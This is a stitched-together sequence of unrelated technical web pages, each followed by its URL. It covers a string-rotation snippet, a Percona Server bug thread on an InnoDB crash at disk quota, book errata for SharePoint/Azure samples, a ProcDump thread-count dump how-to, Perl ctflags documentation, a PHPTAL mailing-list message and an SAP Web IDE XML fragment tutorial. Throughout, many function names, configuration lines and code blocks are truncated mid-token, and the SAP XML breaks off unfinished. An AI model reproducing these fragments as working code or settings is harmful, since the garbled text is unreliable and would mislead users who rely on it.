Remember how I previously wrote that every entity has a unique identifier? In the AdventureWorks LT database, the convention is to use SQL Server identity auto-number columns as the unique identifier/primary key. NHibernate needs to know this important piece of information, as the ID of an entity is special compared with other data columns. To map the ID column of a table, use the <id> element. NHibernate also needs to know how you plan on generating IDs in your system. NHibernate can generate them for you (in the case of GUIDs) or defer to the database system to generate them (in the case of auto-number, sequences, and so on). So every <id> element needs a <generator> child element. To map the AddressID property to the AddressID column using the native database identity generator, use the following XML:

    <id name="AddressID">
      <generator class="native" />
    </id>

As a side note, most RDBMSs have a "native" or preferred form of generating IDs. For Microsoft SQL Server, this is the identity auto-numbering system. For Oracle, sequences are generally used.
Instead of specifically stating "identity" for the <generator> element (which explicitly ties your system to SQL Server), you can use the "native" generator, which instructs NHibernate to automatically use the preferred ID generation system for the underlying database platform. This is important if you ever plan on supporting more than one back-end database platform. I have also found that, even if I only plan to support one database platform, I may still use a different database for testing purposes. For example, if I want to test some particular aspect of my system that involves database access, I may use an in-memory database like SQLite or Firebird, which is easier to set up and host for quick testing scenarios than SQL Server or Oracle.

Mapping the Properties

Next, I'll show you how to map the rest of the properties to the rest of the columns on the Address table. You map properties using the <property> XML element. For simple scenarios where the .NET property name matches the column name in the database, you can simply use the "name" attribute on the <property> element and NHibernate will match them up correctly. Add a <property> element for each property in the Address class. When you're done, it should look something like:

    <property name="AddressLine1" />
    <property name="AddressLine2" />
    <property name="City" />
    <property name="StateProvince" />
    <property name="CountryRegion" />
    <property name="PostalCode" />
    <property name="ModifiedDate" />

Now you have one entity and its associated mapping, and you're ready to begin using NHibernate to perform database operations with it. The full contents of the Address.hbm.xml file should now look like the contents of Listing 1. In the next section, I'll show you how to bootstrap NHibernate and begin performing tasks.

Bootstrapping NHibernate

Now let's switch back to the console application project.
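When a property name does not match its column, or when you want NHibernate to know column details such as length and nullability, the <property> element accepts additional attributes. The column name and size below are made up purely to illustrate the shape:

```xml
<!-- Hypothetical non-default property mappings -->
<property name="City" column="CityName" length="30" not-null="true" />
<property name="ModifiedDate" type="DateTime" update="false" />
```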
I'll add the NHibernate XML configuration file and then write some code to bootstrap NHibernate to the point where I actually connect to a database and begin performing operations.

NHibernate Configuration File

In the console application project, add a new XML file called "hibernate.cfg.xml." Again, this is the default name NHibernate will look for. It isn't required, as there are several ways of configuring NHibernate, but this is the easiest and involves the least amount of code, so it's perhaps the best way to start. Select this new file in Solution Explorer and press F4 to open the Properties window. Change the "Copy to Output Directory" property to "Copy Always." Every time you compile, Visual Studio will copy this XML file to the output folder alongside the EXE file. Next, add a reference to your other project, the one used in the previous section to add the Address entity and its associated mapping HBM file.

NHibernate requires a minimum of four settings to operate:

- The connection provider to use.
- The SQL dialect of the database engine.
- The driver to use for interacting with the database.
- The connection string to use for connecting to the database.

The connection provider (property name "connection.provider") is always "NHibernate.Connection.DriverConnectionProvider." This is an extensibility point for NHibernate, which is why it's a setting and not hard-coded. Extending NHibernate is a very advanced topic and beyond the scope of this article, so for now I'll use the value mentioned above.

The SQL dialect translates NHibernate's intentions into actual SQL statements, accounting for the various peculiarities and non-standard SQL quirks of the database engine and version. Specify this property using the "dialect" key. For SQL Server 2005, the dialect is "NHibernate.Dialect.MsSql2005Dialect."

The driver manages the underlying connection object (i.e., System.Data.SqlClient.SqlConnection), command objects, data readers, etc.
This property's key is "connection.driver_class" and, for SQL Server, the default is "NHibernate.Driver.SqlClientDriver."

The connection string should be familiar to anyone who has done any ADO.NET programming. This is the connection string that NHibernate passes to the connection object to initiate the connection to the database server. It uses the standard ADO.NET connection string format; NHibernate does not tamper with it at all and will pass it directly to the SqlConnection object (for example). The "connection.connection_string" key identifies this property.

Now that you have a good idea about what the four required configuration parameters for NHibernate are, you can create the XML configuration document. It should look something like Listing 2.

Building the Configuration and SessionFactory

Everything is in place now to start using NHibernate. Just to recap, you should have the following things:

- Two projects in a solution, one being a console application project.
- An entity class (Address).
- An XML mapping (Address.hbm.xml).
- A configuration file (hibernate.cfg.xml).

In the Main() method of your console application project, instantiate a new Configuration() object, instruct it to use the hibernate.cfg.xml file for its configuration, point it to your HBM document, and then build a session factory in preparation for creating a new session. Listing 3 shows the start of the sample console application I used to write this article. In this example, I have some basic error handling and some handling for when the application ends (so that the console window doesn't disappear when it's finished). The main meat is in the middle, where the configuration is loaded, the mappings added, and the session factory created. You only need to perform these tasks once per application, at startup. Once you have acquired a session factory, maintain a reference to it for the duration of the application lifetime.
The session factory is thread-safe so you can call it from multiple threads or web requests in the context of a web application. You should note that individual sessions created by the factory are not thread-safe. Be careful to ensure that you only access a given session from a single thread and/or web request at a time.

Creating a Session and Connecting to the Database

From the session factory you just created in the previous section, call the "OpenSession" method to acquire a new session. At this point, the session is essentially a live connection to the database and you should treat it as such for the purposes of connection pooling, memory leaks, performance, and other such concerns. When you open a session, for various reasons, it may not actually connect to the database at first. Instead it may wait until the first time it needs to actually connect. As I said before, treat it as though it is connected by making sure you wrap it with the using() block in C# or a Try/Finally block in VB.

Also, you should always perform database operations with NHibernate through a transaction. Any time you open a session, you should be concerned about transaction management. You can use one transaction per session or multiple transactions per session, but you should always be performing operations within the context of a transaction. Consider the following code example of opening a session and starting a new transaction while preventing connection leaks by using the using() block:

    using (var session = factory.OpenSession())
    using (var xaction = session.BeginTransaction())
    {
        //TODO: work with session and transaction here
    }

Basic Create, Retrieve, Update, and Delete

Now that you have an open session and an active transaction, you can begin performing interesting operations such as saving an entity, retrieving it, deleting it, etc. Let's start by saving a new address.

Saving an Address

Saving an entity is simple with NHibernate once you have a session open.
Simply call the "Save" method on the session and pass in the entity to be saved.

    var address = createNewAddress();
    session.Save(address);
    xaction.Commit();
    var lastAddressID = address.AddressID;

NHibernate will not actually insert the row into the database table at this point. It will batch up commands. The session will automatically "flush" a batch to the database when it needs to, if you explicitly call Flush() on the session, or whenever you commit a transaction. I'll cover the semantics of batching and flushing later in this article. For now, simply commit the transaction to actually flush an address to the database. At the end of the using() block, the session and transaction will close, releasing the connection to the database back to the ADO.NET connection pool.

If you look at the contents of the Address table in the database, you should now see a new row representing the Address you just saved. Congratulations, you've successfully saved your first record using NHibernate!

After having saved an entity, NHibernate automatically works with the database to retrieve the ID that the database assigned to that entity and assigns it to the entity's <id>-mapped property. As an experiment, print out the AddressID of the address entity before and after you save and commit it and you'll notice it changes from 0 to whatever the next identity number is.

Retrieving an Address by Its ID

Retrieving an entity by its ID is also simple. The Load() method on the session will retrieve an entity by its ID and throw an exception if it does not exist in the database. The Get<T>() (Get(Of T)() for VB) method will retrieve the entity or return null if none was found. I prefer to use the Get method since I prefer not to have to throw or trap exceptions for conditions that can otherwise be detected by an "if" statement (seeing as how throwing and catching exceptions is an expensive operation).
For the sake of this example, imagine that this is a separate web request and the user has clicked on a link to load the Address she just saved in the previous request. First, look at the row in the database and copy its AddressID value. Next, in the code, open a new session from the SessionFactory. Next, call the Get<Address>(id) method and pass in the AddressID you just looked up in the database. Assign the return value of the Get call to a variable. Finally, print the AddressLine1 value to the console to verify it all worked. After you're done, your code should look something like this:

    using (var session = factory.OpenSession())
    using (var xaction = session.BeginTransaction())
    {
        var address = session.Get<Address>(lastAddressID);
        //TODO: Do something with the address here
        xaction.Commit();
    }

If you got a NullReferenceException, you probably had the wrong AddressID or there was some other problem. Otherwise, you should see the value you originally entered for AddressLine1 when you saved that address.

Updating an Address

Next, let's take the address you just retrieved from the database, change a property, and update it. Simply modify the AddressLine1 property (or any property except AddressID), and then call the Update() method on the session. Consider this example:

    address.AddressLine1 = "334 Smith Street";
    session.Update(address);
    xaction.Commit();

Now check the values in the database and you should see that they have changed.

Deleting an Address

Hopefully by now you're getting the hang of the basics. Deleting an entity is just as easy as the rest of the CRUD operations. Simply call the Delete() method and pass in the Address to delete.

    session.Delete(address);
    xaction.Commit();

A Little More About the Session

First-level Object Cache

Before I proceed on to more complex scenarios and operations, I want to cover a few more important aspects of the Session object.
The session maintains a cache, called the First Level Cache, of all the objects it has saved or retrieved. This cache lasts the duration of the session. You can "evict" an individual object from the cache or clear everything from it. Evicting and clearing the cache is not something you have to worry about for most regular applications and only comes into play for specific scenarios. The reason the session caches objects is because you may retrieve the same object again, or it may be related to another object you're retrieving, and so the session recognizes objects and IDs it has already loaded and prevents excessive and unnecessary database calls. Most of the time, this is a benefit and you won't have to think or worry about it.

Addressing Some Questions

This is usually the point where, when I'm introducing someone to NHibernate, a million questions pop up. I'm guessing that a million questions are swirling around in your mind about all this right now:

- What about max length on varchar fields?
- What about custom/user types?
- What about aggregate functions?
- What about complex queries?
- What if I want to delete an entity by its ID without having to load it first?
- What about projection queries (selecting a subset of fields from one or more tables instead of a single entity from one table)?
- What about transaction management?
- What about database X feature Y?
- What about default values for columns (like the ModifiedDate on the Address table)?
- What about user-defined types?

NHibernate doesn't address every situation you'll run into when interacting with the database, but it does handle most, including the questions above. Unfortunately, I won't get to all of them in this article. I hope, however, that this article will get you up to speed on the basics and enable you to find more specific information about NHibernate as you evaluate it for your project.

More than Just CRUD

So far, I've only shown basic CRUD operations with NHibernate.
NHibernate can do much more than CRUD, though. Some of NHibernate's greatest features come into play when managing the relationships between multiple entities. One of the more common types of relationships is the many-to-one relationship. A good example of this in the AdventureWorksLT database is the SalesOrderHeader table's foreign key relationship to Customer. You can relate many sales orders to one customer, thus a many-to-one relationship. From now on, I'll call many-to-one relationships "MTO" for brevity. The converse of this relationship is a one-to-many (OTM): one customer can have many sales orders. For now, I'll start with the MTO side since it's easier to map with NHibernate and show examples. After that, I'll talk about the OTM side.

Many-to-One Relationships

Let's start by creating the Customer object the same way you did the Address object. Remember: leave out the rowguid column to keep things easier. When you're finished, it should look something like this:

    public class Customer
    {
        public virtual int CustomerID {get; set;}
        public virtual int NameStyle {get; set;}
        public virtual string Title {get; set;}
        public virtual string FirstName {get; set;}
        public virtual string MiddleName {get; set;}
        public virtual string LastName {get; set;}
        public virtual string Suffix {get; set;}
        //... and so forth
    }

Next, create the SalesOrderHeader object in a similar fashion. The SalesOrderHeader table has a few interesting features on it that, for now, you should just ignore because they are not relevant to this topic. For now, ignore the ShipToAddressID, BillToAddressID, SalesOrderNumber, TotalDue, and rowguid columns. Remember, the basic goal of this exercise is to avoid having to worry about persistence concerns in the main business code. Imagine if you were building your app and didn't have to worry about a database behind it. How would you structure SalesOrderHeader differently?
For starters, you probably wouldn't have a "CustomerID" property; you'd probably have a "Customer" property, and its type wouldn't be Int32, it would simply be "Customer." You'll tell NHibernate in the HBM XML how to map the CustomerID column to the Customer property later. Here's what your SalesOrderHeader class should look like:

    public class SalesOrderHeader
    {
        //... other value properties
        public virtual Customer Customer { get; set; }
    }

Mapping Customer and SalesOrderHeader

Mapping the Customer object is straightforward and should look like the Address mapping, only with different names and properties. Mapping SalesOrderHeader is similarly straightforward except for a few fields. First, SalesOrderNumber and TotalDue are computed columns in SQL Server and either should not be mapped or should be mapped as read only. For now, to keep things simple, just leave these fields out of your mapping and your class.

The "Customer" property is a little different than the normal fields in the table. As I mentioned earlier, the relationship between SalesOrderHeader and Customer is an MTO, so you need to use a new tag (instead of <property>): <many-to-one>. The <many-to-one> tag needs the property name and the column name of the foreign key in the table (the column is only needed if it is different from the property name, which, in our case, it is). Add the <many-to-one> tag to your mapping. It should look something like this:

    <class name="SalesOrderHeader">
      <id name="SalesOrderID">
        <generator class="native" />
      </id>
      <!-- <property> tags here ... -->
      <many-to-one name="Customer" column="CustomerID" />
    </class>

Saving and Updating MTO Relationships

Once you have Customer and SalesOrderHeader created and mapped, you should be able to perform the standard Save/Get/Update/Delete operations just like you did with Address earlier. At this point, in order to create a new Customer and SalesOrderHeader, relate them both, and have them both saved, you'll have to call Save() on both object instances.
NHibernate can do some more intelligent things and cascade-save related entities if you tell it to. I'll get to the more advanced functionality in a little bit. For now, to relate two objects, you would write code like this:

    var customer = createNewCustomer();
    session.Save(customer);
    var order = createNewOrder();
    order.Customer = customer;
    session.Save(order);
    xaction.Commit();

Retrieving the Related Object

When you retrieve the SalesOrderHeader you just saved, NHibernate will, by default, not get the Customer. Instead, it will use a "proxy" object, or a ghost of the Customer. The Customer property on SalesOrderHeader will not be null, but no data is actually loaded yet. As soon as you access any properties on the related Customer proxy, NHibernate will, at that moment, execute a SELECT statement to retrieve the Customer. This all happens transparently, and the code accessing the SalesOrderHeader and/or Customer objects never needs to know that this is happening. This is what I referred to earlier as transparent lazy loading; it is an important feature of NHibernate and actually a key differentiator from other O/RM frameworks, many of which do not support transparent lazy loading.

Note that I said this all happens by default. Certain relations may call for no lazy loading (for example, always load the Customer whenever you load the SalesOrderHeader). You can, in specific situations, tell NHibernate to get a related object or related objects when getting another object. For example, you might want to load a collection of objects for one specific query with lazy-loading disabled.

This concludes part 1 of this article about using NHibernate. You have learned why you want to use NHibernate, techniques for configuring NHibernate, how to map your objects to your data entities, and how to load basic objects.
In part 2 you'll learn more advanced NHibernate concepts including configuring more advanced object relationships, managing lazy loading, and concepts for sorting and filtering data using NHibernate.
http://www.codemag.com/article/0906081
CC-MAIN-2018-05
refinedweb
7,298
53.92
Hey guys, I'm working on a code which if written correctly should be able to print the value of my potentiometer in Processing. And then I don't mean with a flowing colour screen, like the ones I can find on the internet. I want to print the number of the potentiometer on the screen, and when I turn the wheel, the number in Processing should change. I think my code does connect to the potentiometer and does print it in Processing, but it keeps overwriting: the numbers don't change, it just literally writes over the previous numbers.

My Arduino code:

    void setup() {
      //initialize the serial communication:
      Serial.begin(9600);
    }

    void loop() {
      //send the value of analog input 0:
      Serial.println(analogRead(A0));
      //wait a bit for the analog-to-digital converter to stabilize after last
      //reading:
      delay(2);
    }

My Processing code:

    import processing.serial.*;

    Serial myPort;
    PFont myFont;
    float val;
    int[] pin_val;
    int lf = 10;
    boolean received;
    float inByte = 0;

    void setup() {
      size(325,400);
      fill(51,153,255);
      rect(10,10,300,150);
      myFont = createFont("Arial", 18);
      textFont(myFont, 18);
      println(Serial.list());
      myPort = new Serial(this, Serial.list()[0], 9600);
      pin_val = new int[0];
      val = 0;
      received = false;
    }

    void draw() {
      textSize(30);
      fill(255,0,0);
      textAlign(CENTER);
      textFont(myFont, 18);
      text("received: "+inByte, 160,50); //This is where I believe my fault is.
      fill(255,255,255);
      ellipse(162.5,260,80,80);
    }

    void serialEvent (Serial myPort) {
      String inString = myPort.readStringUntil('\n');
      if (inString != null) {
        //trim off any whitespace:
        inString = trim(inString);
        //convert to a float and map to the screen height:
        inByte = float(inString);
        println(inByte);
        inByte = map(inByte, 0, 1023, 0, height);
      }
    }

I know there is a blue rectangle and a white ellipse, but that's part of my homework.
Answers

Please edit your post (gear icon) and format the code correctly by highlighting your code and pressing Ctrl+o (indent four spaces). Then people can actually read it, copy-paste to test, and help you.

You aren't clearing the screen each frame, so you are drawing on top of your old text. Here is a wrong example:

    void draw() {
      text("received: " + inByte, 160, 50);
    }

Instead do this:

    void draw() {
      background(0);
      text("received: " + inByte, 160, 50);
    }

See background() in the reference.

Please format your code. Check previous related posts: For instance:

Kf

I tried multiple times to get the code clear to read, but it won't work. It'll just appear between these things, nothing else.

@jeremydouglas that solved it, thank you! But now I do have another question: the printed number has a maximum of 400. Is this normal, or should it also be able to print the max 1023 of the potentiometer? And in my comment it does work.

Great. (please tag @jeremydouglass -- ss)

Re: Look at your code -- I think it is almost impossible to tell what is commented out and what isn't, because you haven't indented each code line by at least four spaces and left an extra blank line above and below the code block.

You received a number between 0 and 1023. Then you used map() to stretch that number to being between 0 and height. What is height?
for proccesing code I have this The program won't run because it says the port is busy, I get that because at the top I connected 'Arduino' also to port 0. But I dont know how to do it otherwise, since both my button and my potmeter are connected to that port. Please format your code. Edit your post (gear on top right side of any of your posts), select your code and hit ctrl+o. Leave an empty line above and below your block of code. Details here: Please edit your post... It is really hard to read your code. Unfortunately your previous code doesn't seem to be properly formatted either. Your button and potentiometer are connected to the same arduino, right? Then you need to open the port only once. You are opening the same port twice (and using different speeds). Both are a big no no. In your case, I will suggest you write a small program that works with a push button first. THen write another program that uses the potentiometer. Finally, merge the two programs into a third program. This exercise will help you understand the software and routines you need to use with each of your hardware components. It also helps by making sure each component is working by itself. This will save lots of debugging... specially because we don't have your hardware to run your code and test it. Kf @DeDaymar -- I'm glad it was helpful. People have asked you several times to edit and correctly format the code in your posts, and given you instructions on how to do so. Please, please do so if you would like further help from me on this forum. @kfrajer @jeremydouglass okay so I finally got it. Sorry it took so long @kfrajer I did, that's how I figured out what arduino program to use. And I understand that it's a no go to connect both the button and the potentiometer to the same port, but the button has to be connected as well.. Guys I figured it out. My code works! I used an example from processing called arduino_input. I changed that code to how I needed it to be and now it works perfectly. 
Both my button and my potentiometer do what I want. So thank you very much for your help, both. I do have more stuff I have to make, so I might be back, but for now I am done.

Congratulations, @DeDaymar! Thanks also for sharing your solution with the forum.

Great to hear it is working. Just to clarify, I was referring to not opening the same port of your computer twice. If you issue a second open command on an already opened port, you will get an error of "port already open" or along those lines.

Kf
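For anyone following along later: the single-port approach kfrajer describes (one Arduino sketch that reports both inputs, one Serial object opened once in Processing) can be sketched roughly like this. The pin numbers and the comma-separated message format are my assumptions, not the poster's actual solution, and this requires the Arduino hardware to run:

```cpp
// Arduino side: report both readings over a single serial port.
void setup() {
  pinMode(2, INPUT);   // assumed: push button wired to digital pin 2
  Serial.begin(9600);
}

void loop() {
  // One line per sample, e.g. "512,1" -> potentiometer value, button state
  Serial.print(analogRead(A0));
  Serial.print(',');
  Serial.println(digitalRead(2));
  delay(2);
}
```

On the Processing side, a single `new Serial(this, Serial.list()[0], 9600)` is created once in setup(), and serialEvent() can use `split(inString, ',')` to recover the two values from each line.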
https://forum.processing.org/two/discussion/24915/read-potentiometer-serial-from-arduino-on-processing
29 February 2012 11:01 [Source: ICIS news]

TOKYO (ICIS)--A total of 1.34m tonnes of LDPE was shipped within Japan from January to December 2011, down 5% from 2010, according to the Ministry of Economy, Trade and Industry (METI).

Among different applications of LDPE, demand for film production was the highest at 653,578 tonnes, a 9% decrease from the previous year, the data showed.

A total of 190,164 tonnes of LDPE was exported in 2011, a 23% decline from 2010, according to the ministry.

The country's domestic shipments of PP decreased 7% year on year to 2.29m tonnes in 2011, while exports of the product fell 9% to 240,772 tonnes from the previous year.
http://www.icis.com/Articles/2012/02/29/9536790/japan-domestic-shipments-exports-of-primary-resins-fell-in-2011.html
lupacarjie

Hello, I created a simple number guessing game which thinks of a secret number from 1 to 100. It tells the user if his guess is high or low and finally stops when the secret number is equal to the user's input; it also notes down the number of tries. It then asks if the user wants to try again, but whenever it runs to play again, the number of tries adds up to the previous result. What am I missing? Also, the setw() function doesn't seem to work. Thanks!

    #include <cstdlib>  //directive for rand() function
    #include <time.h>   //directive for random pick of number
    #include <iomanip>
    #include <iostream>
    using namespace std;

    int main(){
        srand(time(0)); //changes the secret number
        int number;
        number = rand() % 100 + 1; //range of secret number 1-100
        int guess;
        int tries = 1;
        int play = 1;

    pick:
        cout << setw(5) << "\nWelcome to the Guess the number game! ";
        cout << setw(5) << "\nI'm thinking of a secret number from 1 to 100 ";
        cout << setw(5) << "\nGuess it!\n\n";

        do { //loops until guess is equal to secret number
            cout << "\nEnter your estimate: ";
            cin >> guess;
            if (guess < number){
                cout << "Higher!" << endl;
                tries = tries + 1;}
            else if (guess > number){
                cout << "Lower!" << endl;
                tries = tries + 1;}
            else
                cout << "Your guess is right!" << endl;
        } while (guess != number);

        cout << "\n\nYou tried "<<tries<<" times ";
        char g;
        cout << "\nTry Again? (y for yes or n for no): ";
        cin >> g;
        if(g !='n'){
            srand(time(0));
            play = play + 1;
            system("cls");
            goto pick;}
        else {
            cout << "\nNumber of game plays is "<<play<<"\n\n";}
        system("PAUSE");
        return 0;}
https://www.daniweb.com/software-development/cpp/threads/397476/simple-number-guessing-game
perlmeditation Roy Johnson

Recursive algorithms are often simple and intuitive. Unfortunately, they are also often explosive in terms of memory and execution time required. Take, for example, the N-choose-M algorithm:
<code>
# Given a list of M items and a number N,
# generate all size-N subsets of M
sub choose_n {
    my $n = pop;
    # Base cases
    return if $n > @_;
    return [] if $n == 0;
    # otherwise..
    my ($first, @rest) = @_;
    # combine $first with all N-1 combinations of @rest,
    # and generate all N-sized combinations of @rest
    my @include_combos = choose_n(@rest, $n-1);
    my @exclude_combos = choose_n(@rest, $n);
    return ( (map {[$first, @$_]} @include_combos)
           , @exclude_combos );
}
</code>
Great, as long as you don't want to generate all 10-element subsets of a 20-item list. Or 45-choose-20. In those cases, you will need an iterator. Unfortunately, iteration algorithms are generally completely unlike the recursive ones they mimic. They tend to be a lot trickier.
<p>
But they don't have to be. You can often write iterators that look like their recursive counterparts — they even include recursive calls — but they don't suffer from explosive growth. That is, they'll still take a long time to get through a billion combinations, but they'll start returning them to you right away, and they won't eat up all your memory.
<p>
The trick is to create iterators to use in place of your recursive calls, then do a little just-in-time placement of those iterator creations.
<readmore>So let's take a first stab at choose_n. First, our base cases are going to be subs that return whatever they were returning before, but after returning those values once, they don't return anything anymore:
<code>
sub iter_choose_n {
    my $n = pop;
    # Base cases
    return sub { () } if $n > @_;
    my $once = 0;
    return sub {$once++ ? () : []} if $n == 0;
    my ($first, @rest) = @_;
    return sub {$once++ ? () : [$first, @rest]} if $n == @_;
</code>
Apart from the iterator trappings, we've got essentially what we had before.
Converting the map into an iterator involves some similar work, but the parallels are still pretty obvious. We exhaust the first iterator before turning to the second:
<code>
    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n-1);
    my $exclude_iter = iter_choose_n(@rest, $n);
    return sub {
        if (my $set = $include_iter->()) {
            return [$first, @$set];
        }
        else {
            return $exclude_iter->();
        }
    }
}
</code>
We now have a recursively-defined iterator that wasn't a heck of a lot more complex than our original algorithm. That's the good news. The bad news is: it's still doubly recursive, O(2^N) in space and time, and so will take a long time to start generating data. Time for a little trick. Because we don't use $exclude_iter until we've exhausted $include_iter, we can delay defining it:
<code>
    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n-1);
    my $exclude_iter;
    return sub {
        if (my $set = $include_iter->()) {
            return [$first, @$set];
        }
        else {
            $exclude_iter ||= iter_choose_n(@rest, $n);
            return $exclude_iter->();
        }
    }
}
</code>
Now our code is singly recursive, O(N) in space and time to generate an iterator, and that makes a big difference. Big enough that you probably won't need to go to the trouble of coming up with an O(1) truly iterative solution.
<p>
Of course, if you complete the iterations, eventually you will have generated those 2^N subs, and they'll clog up your memory. You may not be concerned about that (you may not be expecting to perform all that many iterations), but if you are, you can put a little code in to free up exhausted iterators:
<code>
    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n-1);
    my $exclude_iter;
    return sub {
        if ($include_iter and my $set = $include_iter->()) {
            return [$first, @$set];
        }
        else {
            if ($include_iter) {
                undef $include_iter;
                $exclude_iter = iter_choose_n(@rest, $n);
            }
            return $exclude_iter->();
        }
    }
}
</code>
</readmore>
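As a usage sketch (not part of the original meditation): once iter_choose_n is defined, pulling combinations out of it is just a loop. Each call hands back one combination as an array ref until the stream is exhausted; depending on how the base cases are written, an empty combination may also appear at exhaustion, so the loop guards against that too.

```perl
use strict;
use warnings;

my $iter = iter_choose_n(qw(a b c d), 2);
while (defined(my $set = $iter->())) {
    last unless @$set;    # stop at exhaustion (or on an empty combination)
    print "@$set\n";      # a b, a c, a d, b c, b d, c d -- one per line
}
```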
<!-- Node text goes above. Div tags should contain sig only --> <div class="pmsig"><div class="pmsig-300037"> <hr> <small><b>Caution:</b> Contents may have been coded under pressure.</small> </div></div>
https://www.perlmonks.org/?displaytype=xml;node_id=458418
A library for building decoders using the pipeline (`|>`) operator and ordinary function calls.

It's common to decode into a record that has a type alias. Here's an example of this from the `object3` docs:

    type alias Job =
        { name : String, id : Int, completed : Bool }

    job : Decoder Job
    job =
        object3 Job
            ("name" := string)
            ("id" := int)
            ("completed" := bool)

This works because a record type alias can be called as a normal function. In that case it accepts one argument for each field (in whatever order the fields are declared in the type alias) and then returns an appropriate record built with those arguments.

The `objectN` decoders are straightforward, but require manually changing N whenever the field count changes. This library provides functions designed to be used with the `|>` operator, with the goal of having decoders that are both easy to read and easy to modify. Here is a decoder built with this library.

    import Json.Decode exposing (int, string, float, Decoder)
    import Json.Decode.Pipeline exposing (decode, required, optional, hardcoded)

    type alias User =
        { id : Int
        , email : String
        , name : String
        , percentExcited : Float
        }

    userDecoder : Decoder User
    userDecoder =
        decode User
            |> required "id" int
            |> required "email" string
            |> optional "name" string "(fallback if name not provided)"
            |> hardcoded 1.0

In this example:

- `decode` is a synonym for `succeed` (it just reads better here)
- `required "id" int` is similar to `("id" := int)`
- `optional` is like `required`, but if the field is not present, decoding does not fail; instead it succeeds with the provided fallback value.
- `hardcoded` does not look at the provided JSON, and instead always decodes to the same value.
You could use this decoder as follows:

    Json.Decode.decodeString userDecoder """
        {"id": 123, "email": "sam@example.com", "name": "Sam Sample"}
    """

The result would be:

    { id = 123
    , email = "sam@example.com"
    , name = "Sam Sample"
    , percentExcited = 1.0
    }

Alternatively, you could use it like so:

    Json.Decode.decodeString userDecoder """
        {"id": 123, "email": "sam@example.com", "percentExcited": "(hardcoded)"}
    """

In this case, the result would be:

    { id = 123
    , email = "sam@example.com"
    , name = "(fallback if name not provided)"
    , percentExcited = 1.0
    }
https://package.frelm.org/repo/84/1.1.0
There are two strings. We need to find if one string is a rotation of the other, and if yes, how many places it was rotated. The solution is pretty straightforward. I will describe two ways in this post.

First Method

Let us assume we have two strings "hello" and "llohe".

    Original String

       0     1     2     3     4
    +-----+-----+-----+-----+-----+
    |  h  |  e  |  l  |  l  |  o  |
    +-----+-----+-----+-----+-----+

    3 characters rotated right

       0     1     2     3     4
    +-----+-----+-----+-----+-----+
    |  l  |  l  |  o  |  h  |  e  |
    +-----+-----+-----+-----+-----+

First we will check if the two given strings are of the same length. If they are then we proceed, else we don't. After the rotation, the string starts at location 3, wraps around at location 4, and ends at location 2. If we concatenate the rotated string at the end of itself, like the diagram below, then the wrap-around point will still be at location 4, but we can continue reading the string from location 5 instead of going back to location 0, thus enabling us to find the string linearly.

    rotated string concatenated

       0     1     2     3     4     5     6     7     8     9
    +-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+
    |  l  |  l  |  o  |  h  |  e  |  l  |  l  |  o  |  h  |  e  |
    +-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+
                                  |
                     at this line the string wraps

Because the string will wrap at location k, where 0 <= k <= (len-1), the first k characters will always be inside the first part of the concatenated string, starting at location (len - k), and the remaining (len - k) characters will be in the second part of the concatenated string, starting at location len. Therefore the entire string will span (len - k) to (2 * len - k - 1).

For example, the above diagram has wrap location k=2 (after 'e' of "hello") and len = 5. Therefore the string spans index locations 3 to 7 in the concatenated array.

So, finding if the string is rotated is now easy. We just need to check whether the original string is a substring of the concatenation of the rotated string with itself.
To know how many places it was rotated right, we need to find at which location the substring match was found in the concatenated string. The value for the number of places rotated will be that integer mod len. This is because if a string is rotated right a multiple of len times, the extra full rotations cannot be detected, since in that case we have the original string back. If the string is rotated left, then this method will find the number of right shifts required to get the same rotated string.

We check the length of the two strings at first because if the rotated string has some other characters at the end or beginning, then the process may fail. For example, if the string is "hello" and the rotated string is "lloxxhe", then without the length check the above method might detect them as rotated equivalents of each other.

Here is the code.

    #include <stdio.h>
    #include <string.h>

    #define STR_MAX 128

    int check_if_rot (char *str, char *rot)
    {
      char concatenated[2*STR_MAX];
      char *offset;

      if (strlen (str) != strlen (rot))
      {
        return -1;
      }

      strcpy (concatenated, rot);
      strcat (concatenated, rot);

      offset = strstr (concatenated, str);
      if (offset == NULL)
      {
        return -1;
      }
      else
      {
        return (int)(offset - (char *)concatenated);
      }
    }

    int main (void)
    {
      char str[STR_MAX], rot[STR_MAX];
      int rot_amt;

      printf ("Enter string: ");
      scanf (" %s", str);
      printf ("Enter rotated string: ");
      scanf (" %s", rot);

      rot_amt = check_if_rot (str, rot);
      if (rot_amt == -1)
      {
        printf ("The string \"%s\" is not a rotation of \"%s\"\n", str, rot);
      }
      else
      {
        printf ("The string \"%s\" IS a rotation of \"%s\". Amount of rotation is %d\n", str, rot, rot_amt);
      }

      return 0;
    }

The function check_if_rot () checks if the string pointed to by the second parameter is a rotation of the string pointed to by the first parameter (or the other way around). If true, it returns the amount of rotation; else it returns -1. This method uses extra space, twice the size of the string.
Second Method

The concatenation of the rotated string to itself was done so that we could use the string search function to find the occurrence of the original string in the rotated string, which wraps at the end. Instead of concatenating the rotated string to itself, we can modify the string search so that it automatically wraps around the rotated string while matching. Consider the diagram again.

Original String

     0     1     2     3     4
  +-----+-----+-----+-----+-----+
  |  h  |  e  |  l  |  l  |  o  |
  +-----+-----+-----+-----+-----+

3 characters rotated right

     0     1     2     3     4
  +-----+-----+-----+-----+-----+
  |  l  |  l  |  o  |  h  |  e  |
  +-----+-----+-----+-----+-----+

Here we can run a naive string search algorithm, starting from each character and testing if the target string starts at that location. Proceeding this way, we match 'h' of the original string at location 3 of the rotated string. Then location 1 in the original matches location 4 in the rotated. Next we match location 2 in the original with location 0 in the rotated. This can be done by matching the ith location of the original string against the ((k+i) mod n)th location of the rotated string, where k is a candidate start point of the string in the rotated string. This is basically the same mechanism as the previous method; here the string spans (len - k) to ((2 * len - k - 1) mod n). The difference from the previous method is that when the end of the string is reached, instead of continuing linearly into the concatenated portion, we use the modulus operator to wrap around to the beginning of the string and continue the search. This saves the extra storage. The function is as below.

  int check_if_rot1 (char *str, char *rot)
  {
    int n = strlen (str), pos, i, flag;

    if (n != strlen (rot))
    {
      return -1;
    }

    for (pos=0; pos<n; pos++)
    {
      for (i=0, flag=0; i<n; i++)
      {
        if (rot[(pos+i)%n] != str[i])
        {
          flag = 1;
          break;
        }
      }
      if (flag == 0)
      {
        return pos;
      }
    }
    return -1;
  }

pos is the position in the rotated string from which we try to find a match with the original string.
